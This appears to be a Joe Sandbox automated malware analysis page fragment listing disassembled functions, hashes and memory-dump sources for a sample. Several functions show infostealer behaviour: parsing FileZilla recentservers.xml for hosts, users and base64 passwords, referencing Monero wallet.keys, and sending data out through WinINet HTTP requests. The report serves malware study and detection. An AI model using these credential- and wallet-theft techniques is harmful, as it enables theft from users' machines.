                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8e148c84a64d108cbc21a7f7ce725d14dc4904c1855244a23d00f6cb5e732797
                            • Instruction ID: 9f9094c135d1f232b09fc03c2d3895c4790523a5ad5dddf47423e76235c9e06f
                            • Opcode Fuzzy Hash: 8e148c84a64d108cbc21a7f7ce725d14dc4904c1855244a23d00f6cb5e732797
                            • Instruction Fuzzy Hash: AB5106F29087049FE3086F2DEC9533AB7E5EF94720F1A463DE5D5C7380EA396845864A
                            Function 0076ACA0 Relevance: .2, Instructions: 168COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91b881e467f4dbbf7f49b85f02629582a0d1464499b94c91115b9c249a729ade
                            • Instruction ID: 0ea4152e23386bca2a606e154f38988a509aca1f68ada22d708996d688169a8d
                            • Opcode Fuzzy Hash: 91b881e467f4dbbf7f49b85f02629582a0d1464499b94c91115b9c249a729ade
                            • Instruction Fuzzy Hash: 7B414CF220C604FFD3042E65EC95A7AB7D5E790320F36892EEAC356A08E2394401AA53
                            Function 0060BCC8 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb6598a31357295bffb313a33d4555a4cd4cc89241a1e9f2e89d09b0f22e9480
                            • Instruction ID: eab180bf08892e8709fd06bf14143259f1cedbd2860eb54cce9379aaf4e3afb7
                            • Opcode Fuzzy Hash: cb6598a31357295bffb313a33d4555a4cd4cc89241a1e9f2e89d09b0f22e9480
                            • Instruction Fuzzy Hash: 283123FB55C31C5FE340BDF9AC98767BAC9E710760F158639AA50C7704FAA59A004285
                            Function 005B34C6 Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 597d33477068c160c0e94618b98f93478540c9488bc81e3bfe427863f5dc00ec
                            • Instruction ID: 1e0762630ff2dacc87624aad443dd9fcd1e8237417371e8d876ccf125d5e0542
                            • Opcode Fuzzy Hash: 597d33477068c160c0e94618b98f93478540c9488bc81e3bfe427863f5dc00ec
                            • Instruction Fuzzy Hash: F53139F3A282149BF308657CDC957B6B6CADB58320F2B093DD685D7780ED79990083C6
                            Function 007EDE77 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7bafa5544c3af82d3a8ac8f12bef0013df5d894a30b343a771bd3b884e3d0418
                            • Instruction ID: 519f4b6211c43426bc13f263e2b7e2ee398deef80282516238c38fb569cc1c11
                            • Opcode Fuzzy Hash: 7bafa5544c3af82d3a8ac8f12bef0013df5d894a30b343a771bd3b884e3d0418
                            • Instruction Fuzzy Hash: 543108B290C210EFD315BF18D85166AFBE5FF58710F16482DEAD983250E7355850CA8B
                            Function 005A754D Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d16ac5993d935abe740afc672c82da3bddf0fde97bf337c467715f90cf96f972
                            • Instruction ID: 2b5509369c441ff732bf69721a418d9719c31278a719b6b1dcc25d349adc41a7
                            • Opcode Fuzzy Hash: d16ac5993d935abe740afc672c82da3bddf0fde97bf337c467715f90cf96f972
                            • Instruction Fuzzy Hash: 4FE086B214930CCFD3407851EC8C7BBB79CE755731E948469AB5142644FE742608516A
                            Function 00359750 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00350250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00360DBA,00360DB7,00360DB6,00360DB3), ref: 00350362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00350369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00350385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 003503CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 003503DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00350419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00350463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 00350532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00350562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00350571
                            • lstrcat.KERNEL32(?,url: ), ref: 00350580
                            • lstrcat.KERNEL32(?,00000000), ref: 00350593
                            • lstrcat.KERNEL32(?,00361678), ref: 003505A2
                            • lstrcat.KERNEL32(?,00000000), ref: 003505B5
                            • lstrcat.KERNEL32(?,0036167C), ref: 003505C4
                            • lstrcat.KERNEL32(?,login: ), ref: 003505D3
                            • lstrcat.KERNEL32(?,00000000), ref: 003505E6
                            • lstrcat.KERNEL32(?,00361688), ref: 003505F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00350604
                            • lstrcat.KERNEL32(?,00000000), ref: 00350617
                            • lstrcat.KERNEL32(?,00361698), ref: 00350626
                            • lstrcat.KERNEL32(?,0036169C), ref: 00350635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00360DB2), ref: 0035068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 995d46156f57353530ff645d42cd86d1f2751c67244f6dd0f93b5baa951062f6
                            • Instruction ID: 664056df823ffb48b4b0c01792bbb7c7be16291cea870dfac9cca5e2776ad156
                            • Opcode Fuzzy Hash: 995d46156f57353530ff645d42cd86d1f2751c67244f6dd0f93b5baa951062f6
                            • Instruction Fuzzy Hash: 87D131719002089BDB06EBE0DD96DEE7778FF14301F448519F902BA0A5EF74AA0DEB61
                            Function 00345960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003459F8
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 00345A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FBE798,00000000,?,00FAFB60,00000000,?,00361A1C), ref: 00345E71
                            • lstrlen.KERNEL32(00000000), ref: 00345E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00345E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00345E9A
                            • lstrlen.KERNEL32(00000000), ref: 00345EAF
                            • lstrlen.KERNEL32(00000000), ref: 00345ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00345EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00345F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00345F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00345F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00345FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00345FBD
                            • HttpOpenRequestA.WININET(00000000,00FBE808,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00345BF8
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • InternetCloseHandle.WININET(00000000), ref: 00345FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: c08a75fcc30be063f052392fbf1c84ee5875444a92963a02c4f52b19eb09fbf3
                            • Instruction ID: b07b1f13b46d0ae598d61572f70002a52ef668b028f3cd5fb0125ed9451f6651
                            • Opcode Fuzzy Hash: c08a75fcc30be063f052392fbf1c84ee5875444a92963a02c4f52b19eb09fbf3
                            • Instruction Fuzzy Hash: C6122371820518ABDB16EBA0DC95FEE7778BF14701F404259F9067A0A1EF702A4DEF61
                            Function 0034CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0034D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D208
                            • lstrcat.KERNEL32(?,00361478), ref: 0034D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D22A
                            • lstrcat.KERNEL32(?,0036147C), ref: 0034D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D24C
                            • lstrcat.KERNEL32(?,00361480), ref: 0034D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D26E
                            • lstrcat.KERNEL32(?,00361484), ref: 0034D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D290
                            • lstrcat.KERNEL32(?,00361488), ref: 0034D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D2B2
                            • lstrcat.KERNEL32(?,0036148C), ref: 0034D2C1
